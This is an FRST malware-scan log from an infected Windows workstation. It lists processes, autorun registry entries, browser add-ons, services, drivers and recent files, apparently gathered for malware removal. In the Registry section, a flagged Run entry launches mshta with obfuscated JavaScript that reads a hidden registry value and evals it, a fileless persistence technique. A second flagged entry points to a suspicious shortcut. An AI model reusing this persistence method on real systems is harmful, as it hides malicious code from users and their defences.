(McAfee, Inc.) C:\Program Files\TrueKey\McAfee.TrueKey.Service.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Smc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSvcHst.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe
(Renesas Electronics Corporation) C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\BusinessMessaging.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Microsoft Corporation) C:\Windows\System32\mobsync.exe
(McAfee, Inc.) C:\Program Files\TrueKey\McTkSchedulerService.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Farbar) \\SPARTA\RedirectedFolders\cjerald\Desktop\FRST64.exe


==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2585744 2015-08-18] (NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\rundll32.exe C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM\...\Run: [LogMeIn GUI] => C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe [57928 2013-11-05] (LogMeIn, Inc.)
HKLM-x32\...\Run: [NUSB3MON] => C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe [113288 2011-01-23] (Renesas Electronics Corporation)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2016-09-22] (Oracle Corporation)
HKLM-x32\...\Run: [Malwarebytes Anti-Malware] => C:\Program Files (x86)\Malwarebytes Anti-Malware\BusinessMessaging.exe [3219456 2016-11-01] (Malwarebytes)
Winlogon\Notify\GoToAssist: C:\Program Files (x86)\Citrix\GoToAssist Corporate\1019\G2AWinLogon_x64.dll (Citrix Online, a division of Citrix Systems, Inc.)
HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\...\Run: [Backblaze] => C:\Program Files (x86)\Backblaze\bzbui.exe [596648 2016-11-16] ()
HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\...\Run: [**pmrnby<*>] => "C:\Windows\system32\mshta.exe" javascript:T3ijyR1="CI6m7d";C90X=new%20ActiveXObject("WScript.Shell");v3atS8h="c";uT1ax2=C90X.RegRead("HKCU\\software\\auux\\onnlw");LK9oPb9="8oAt";eval(uT1ax2);Xr1GT=" (the data entry has 8 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\...\Run: [**wqgzvwnow<*>] => "C:\Users\cjerald\AppData\Local\322148\4c5510.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-18\...\Run: [Backblaze] => C:\Program Files (x86)\Backblaze\bzbui.exe [596648 2016-11-16] ()
IFEO\ehshell.exe: [Debugger] "C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe" -MceShellRedirect
Lsa: [Notification Packages] scecli C:\Program Files\WIDCOMM\Bluetooth Software\BtwProximityCP.dll C:\Program Files\TrueKey\McAfeeTrueKeyPasswordFilter
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  No File
GroupPolicyScripts: Restriction <======= ATTENTION
GroupPolicyScripts\User: Restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.0.105 192.168.0.1
Tcpip\..\Interfaces\{C095AEBB-3422-4678-BFF1-85A8F1306E8D}: [DhcpNameServer] 192.168.0.105 192.168.0.1

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://msn.com/
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Symantec Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\bin\IPS\IPSBHO.DLL [2014-10-03] (Symantec Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\ssv.dll [2016-11-16] (Oracle Corporation)
BHO-x32: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2013-09-03] (Adobe Systems Incorporated)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\jp2ssv.dll [2016-11-16] (Oracle Corporation)
BHO-x32: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2013-09-03] (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2013-09-03] (Adobe Systems Incorporated)
Toolbar: HKU\S-1-5-21-3320201264-2921037059-4171379232-1148 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
DPF: HKLM-x32 {FD0B6769-6490-4A91-AA0A-B5AE0DC75AC9} hxxps://secure.logmein.com//activex/ractrl.cab?lmi=1091

FireFox:
========
FF ProfilePath: C:\Users\cjerald\AppData\Roaming\Mozilla\Firefox\Profiles\2ak3a5ce.default-1478012619453 [2016-11-14]
FF Homepage: Mozilla\Firefox\Profiles\2ak3a5ce.default-1478012619453 -> hxxp://www.msn.com/
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn
FF Extension: (Adobe Acrobat - Create PDF) - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn [2013-12-17] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{BBDA0591-3099-440a-AA10-41764D9DB4DB}] - C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\IPSFFPlgn => not found
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_23_0_0_162.dll [2016-09-26] ()
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_23_0_0_162.dll [2016-09-26] ()
FF Plugin-x32: @java.com/DTPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\dtplugin\npDeployJava1.dll [2016-11-16] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\plugin2\npjp2.dll [2016-11-16] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2015-08-17] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2015-08-17] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-29] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-29] (Google Inc.)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Air\nppdf32.dll [2013-09-03] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-3320201264-2921037059-4171379232-1148: @citrixonline.com/appdetectorplugin -> C:\Users\cjerald\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2014-01-07] (Citrix Online)

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default [2016-11-16]
CHR Extension: (Google Docs) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-03-19]
CHR Extension: (Google Drive) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-06-13]
CHR Extension: (YouTube) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-06-13]
CHR Extension: (Google Search) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-04-20]
CHR Extension: (Google Docs Offline) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-06-13]
CHR Extension: (Avast Online Security) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2016-11-09]
CHR Extension: (Chrome Web Store Payments) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-06-13]
CHR Extension: (Gmail) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-04-20]
CHR Extension: (Chrome Media Router) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-11-01]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 bzserv; C:\Program Files (x86)\Backblaze\bzserv.exe [356008 2016-11-16] ()
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1148560 2015-08-18] (NVIDIA Corporation)
S4 GoToAssist; C:\Program Files (x86)\Citrix\GoToAssist Corporate\1019\g2aservice.exe [309080 2014-07-24] (Citrix Online, a division of Citrix Systems, Inc.)
R2 IntelBCAsvc; C:\Program Files\Intel\BCA\pabeSvc64.exe [3020440 2015-11-25] (Intel® Corporation)
R2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe [419336 2016-10-12] (LogMeIn, Inc.)
R2 LMIMaint; C:\Program Files (x86)\LogMeIn\x64\RaMaint.exe [509448 2016-10-12] (LogMeIn, Inc.)
R2 LogMeIn; C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe [407424 2013-11-05] (LogMeIn, Inc.)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1706128 2015-08-18] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [21833360 2015-08-18] (NVIDIA Corporation)
R2 psqlWGE; C:\Program Files (x86)\Pervasive Software\PSQL\bin\w3dbsmgr.exe [435488 2009-11-17] (Pervasive Software Inc.)
R2 SepMasterService; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSvcHst.exe [144496 2014-10-03] (Symantec Corporation)
R3 SmcService; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Smc.exe [2379128 2014-10-03] (Symantec Corporation)
S3 SNAC; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\snac64.exe [335216 2014-10-03] (Symantec Corporation)
R2 TrueKey; C:\Program Files\TrueKey\McAfee.TrueKey.Service.exe [874784 2016-04-21] (McAfee, Inc.)
R2 TrueKeyScheduler; C:\Program Files\TrueKey\McTkSchedulerService.exe [15736 2016-04-21] (McAfee, Inc.)
S3 TrueKeyServiceHelper; C:\Program Files\TrueKey\McAfee.TrueKey.ServiceHelper.exe [86864 2016-04-21] (McAfee, Inc.)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 BHDrvx64; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\BASHDefs\20161116.005\BHDrvx64.sys [1854712 2016-09-07] (Symantec Corporation)
R1 ccSettings_{690CFB39-3E68-4966-A470-3A946C640A12}; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\ccSetx64.sys [169048 2014-10-03] (Symantec Corporation)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [497368 2016-10-04] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [156888 2016-10-04] (Symantec Corporation)
R1 IDSVia64; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\IPSDefs\20161118.011\IDSvia64.sys [1012952 2016-10-26] (Symantec Corporation)
R2 LMIInfo; C:\Program Files (x86)\LogMeIn\x64\RaInfo.sys [16056 2013-11-05] (LogMeIn, Inc.)
S4 LMIRfsClientNP; no ImagePath
R3 NAVENG; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\VirusDefs\20161118.009\ENG64.SYS [138456 2016-11-16] (Symantec Corporation)
R3 NAVEX15; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\VirusDefs\20161118.009\EX64.SYS [2148056 2016-11-16] (Symantec Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [19600 2015-08-18] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [38032 2015-08-18] (NVIDIA Corporation)
R1 SRTSP; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SRTSP64.SYS [867032 2014-10-03] (Symantec Corporation)
R1 SRTSPX; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SRTSPX64.SYS [36952 2014-10-03] (Symantec Corporation)
S3 SyDvCtrl; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\SyDvCtrl64.sys [35432 2014-10-03] (Symantec Corporation)
R0 SymDS; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SYMDS64.SYS [493656 2014-10-03] (Symantec Corporation)
R0 SymEFA; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SYMEFA64.SYS [1148120 2014-10-03] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [177752 2016-11-16] (Symantec Corporation)
R1 SymIRON; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\Ironx64.SYS [225496 2014-10-03] (Symantec Corporation)
R1 SYMNETS; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SYMNETS.SYS [437976 2014-10-03] (Symantec Corporation)
R1 SysPlant; C:\Windows\System32\Drivers\SysPlant.sys [155472 2016-11-16] (Symantec Corporation)
S3 aswVmm; \??\C:\Users\cjerald\AppData\Local\Temp\aswVmm.sys [X]
S3 catchme; \??\C:\ComboFix\catchme.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-11-19 16:32 - 2016-11-19 16:32 - 00000000 ____D C:\FRST
2016-11-18 20:58 - 2016-11-19 16:03 - 00000000 ____D C:\Users\cjerald\AppData\Local\322148
2016-11-18 16:04 - 2016-11-18 19:25 - 00000000 ____D C:\Users\cjerald\Pavark
2016-11-18 15:23 - 2016-11-19 16:30 - 00000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2016-11-18 15:20 - 2016-11-18 15:48 - 00000000 ____D C:\Users\cjerald\Downloads\Rootkit Removers
2016-11-16 22:11 - 2016-11-16 22:11 - 06449720 _____ C:\Users\cjerald\Downloads\install_backblaze.exe
2016-11-16 22:08 - 2016-11-18 11:02 - 00000000 ____D C:\Program Files\MyDefrag v4.3.1
2016-11-16 22:08 - 2016-11-16 22:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MyDefrag v4.3.1
2016-11-16 22:08 - 2010-05-21 12:11 - 01147392 _____ (J.C. Kessels) C:\Windows\system32\MyDefragScreenSaver_v4.3.1.exe
2016-11-16 22:08 - 2010-05-21 12:11 - 00485376 _____ (J.C. Kessels) C:\Windows\system32\MyDefragScreenSaver_v4.3.1.scr
2016-11-16 22:07 - 2016-11-16 22:07 - 02082630 _____ (J.C. Kessels ) C:\Users\cjerald\Downloads\MyDefrag-v4.3.1.exe
2016-11-16 21:31 - 2016-11-16 21:31 - 00110424 _____ C:\Users\clayton\AppData\Local\GDIPFONTCACHEV1.DAT
2016-11-16 21:19 - 2016-11-16 21:19 - 00000000 ____D C:\Users\clayton\AppData\Local\NVIDIA Corporation
2016-11-16 21:18 - 2016-11-16 21:18 - 00000000 ____D C:\Users\clayton\AppData\Roaming\Windows Small Business Server
2016-11-16 21:18 - 2016-11-16 21:18 - 00000000 ____D C:\Users\clayton\AppData\Roaming\Adobe
2016-11-16 21:18 - 2016-11-16 21:18 - 00000000 ____D C:\Users\clayton\AppData\Local\Symantec
2016-11-16 21:18 - 2016-11-16 21:18 - 00000000 ____D C:\Users\clayton\AppData\Local\NVIDIA
2016-11-16 21:18 - 2016-11-16 21:18 - 00000000 ____D C:\Users\clayton\AppData\Local\LogMeIn
2016-11-16 21:18 - 2016-11-16 21:18 - 00000000 ____D C:\Users\clayton\AppData\Local\Google
2016-11-16 21:17 - 2016-11-16 21:17 - 00000000 ____D C:\Users\clayton\AppData\Local\VirtualStore
2016-11-16 07:58 - 2016-11-16 07:58 - 00097856 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2016-11-16 07:58 - 2016-11-16 07:58 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-11-16 07:58 - 2016-11-16 07:58 - 00000000 ____D C:\Program Files (x86)\Java
2016-11-16 07:54 - 2016-11-16 07:54 - 00000000 ____D C:\Users\cjerald\AppData\Roaming\Sun
2016-11-16 07:51 - 2016-11-16 07:51 - 00737344 _____ (Oracle Corporation) C:\Users\cjerald\Downloads\chromeinstall-8u111.exe
2016-11-16 02:55 - 2016-11-16 02:55 - 00000000 ____D C:\ProgramData\Sophos
2016-11-16 02:54 - 2016-11-16 02:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sophos
2016-11-16 02:54 - 2016-11-16 02:54 - 00000000 ____D C:\Program Files (x86)\Sophos
2016-11-16 02:50 - 2016-11-16 02:51 - 155406624 _____ (Sophos Limited) C:\Users\cjerald\Downloads\Sophos Virus Removal Tool.exe
2016-11-16 00:34 - 2016-11-16 00:34 - 00448512 _____ (OldTimer Tools) C:\Users\cjerald\Downloads\TFC.exe
2016-11-15 13:32 - 2016-11-15 15:03 - 00044360 __RSH C:\ProgramData\ntuser.pol
2016-11-15 02:13 - 2016-08-22 14:20 - 00332512 _____ (Trend Micro Inc.) C:\Windows\system32\Drivers\tmcomm.sys
2016-11-15 02:12 - 2016-11-15 02:12 - 02527376 _____ (Trend Micro Inc.) C:\Users\cjerald\Downloads\HousecallLauncher64 (1).exe
2016-11-14 19:40 - 2016-11-14 19:40 - 00000000 ____D C:\Users\cjerald\AppData\Local\ESET
2016-11-14 19:39 - 2016-11-14 19:39 - 06761600 _____ (ESET spol. s r.o.) C:\Users\cjerald\Downloads\esetonlinescanner_enu.exe
2016-11-14 19:07 - 2016-11-14 19:07 - 00023783 _____ C:\ComboFix.txt
2016-11-14 13:00 - 2016-10-07 18:25 - 00002291 ____N C:\Windows\system32\SetupBD.din
2016-11-14 12:55 - 2016-11-14 12:55 - 81335920 _____ C:\Users\cjerald\Downloads\PROWinx64.exe
2016-11-14 12:43 - 2016-11-14 12:43 - 00362144 _____ (Roadkil.Net ) C:\Users\cjerald\Downloads\CommTest.exe
2016-11-14 12:43 - 2016-11-14 12:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Roadkil.Net
2016-11-14 12:43 - 2016-11-14 12:43 - 00000000 ____D C:\Program Files (x86)\Roadkil.Net
2016-11-09 15:50 - 2016-11-02 10:36 - 00382696 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2016-11-09 15:50 - 2016-11-02 10:32 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll
2016-11-09 15:50 - 2016-11-02 10:32 - 00046080 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2016-11-09 15:50 - 2016-11-02 10:32 - 00041472 _____ (Microsoft Corporation) C:\Windows\system32\lpk.dll
2016-11-09 15:50 - 2016-11-02 10:32 - 00014336 _____ (Microsoft Corporation) C:\Windows\system32\dciman32.dll
2016-11-09 15:50 - 2016-11-02 10:22 - 00308456 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\atmfd.dll
2016-11-09 15:50 - 2016-11-02 10:16 - 00070656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontsub.dll
2016-11-09 15:50 - 2016-11-02 10:16 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\lpk.dll
2016-11-09 15:50 - 2016-11-02 10:16 - 00010240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dciman32.dll
2016-11-09 15:50 - 2016-11-02 09:53 - 00034304 _____ (Adobe Systems) C:\Windows\SysWOW64\atmlib.dll
2016-11-09 15:50 - 2016-10-27 22:59 - 00394440 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2016-11-09 15:50 - 2016-10-27 22:14 - 00346320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2016-11-09 15:50 - 2016-10-27 14:13 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2016-11-09 15:50 - 2016-10-27 14:13 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2016-11-09 15:50 - 2016-10-27 13:55 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2016-11-09 15:50 - 2016-10-27 13:54 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2016-11-09 15:50 - 2016-10-27 13:54 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2016-11-09 15:50 - 2016-10-27 13:53 - 00576000 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2016-11-09 15:50 - 2016-10-27 13:53 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2016-11-09 15:50 - 2016-10-27 13:51 - 02896384 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2016-11-09 15:50 - 2016-10-27 13:44 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2016-11-09 15:50 - 2016-10-27 13:43 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2016-11-09 15:50 - 2016-10-27 13:38 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2016-11-09 15:50 - 2016-10-27 13:37 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2016-11-09 15:50 - 2016-10-27 13:37 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2016-11-09 15:50 - 2016-10-27 13:37 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2016-11-09 15:50 - 2016-10-27 13:37 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2016-11-09 15:50 - 2016-10-27 13:28 - 25763328 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-11-09 15:50 - 2016-10-27 13:28 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2016-11-09 15:50 - 2016-10-27 13:24 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2016-11-09 15:50 - 2016-10-27 13:19 - 06047744 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2016-11-09 15:50 - 2016-10-27 13:15 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2016-11-09 15:50 - 2016-10-27 13:13 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2016-11-09 15:50 - 2016-10-27 13:09 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2016-11-09 15:50 - 2016-10-27 13:08 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2016-11-09 15:50 - 2016-10-27 13:05 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2016-11-09 15:50 - 2016-10-27 13:02 - 00152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2016-11-09 15:50 - 2016-10-27 12:49 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2016-11-09 15:50 - 2016-10-27 12:46 - 00806912 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2016-11-09 15:50 - 2016-10-27 12:46 - 00725504 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2016-11-09 15:50 - 2016-10-27 12:44 - 02131456 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2016-11-09 15:50 - 2016-10-27 12:44 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2016-11-09 15:50 - 2016-10-27 12:17 - 15257088 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-11-09 15:50 - 2016-10-27 12:16 - 02920448 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
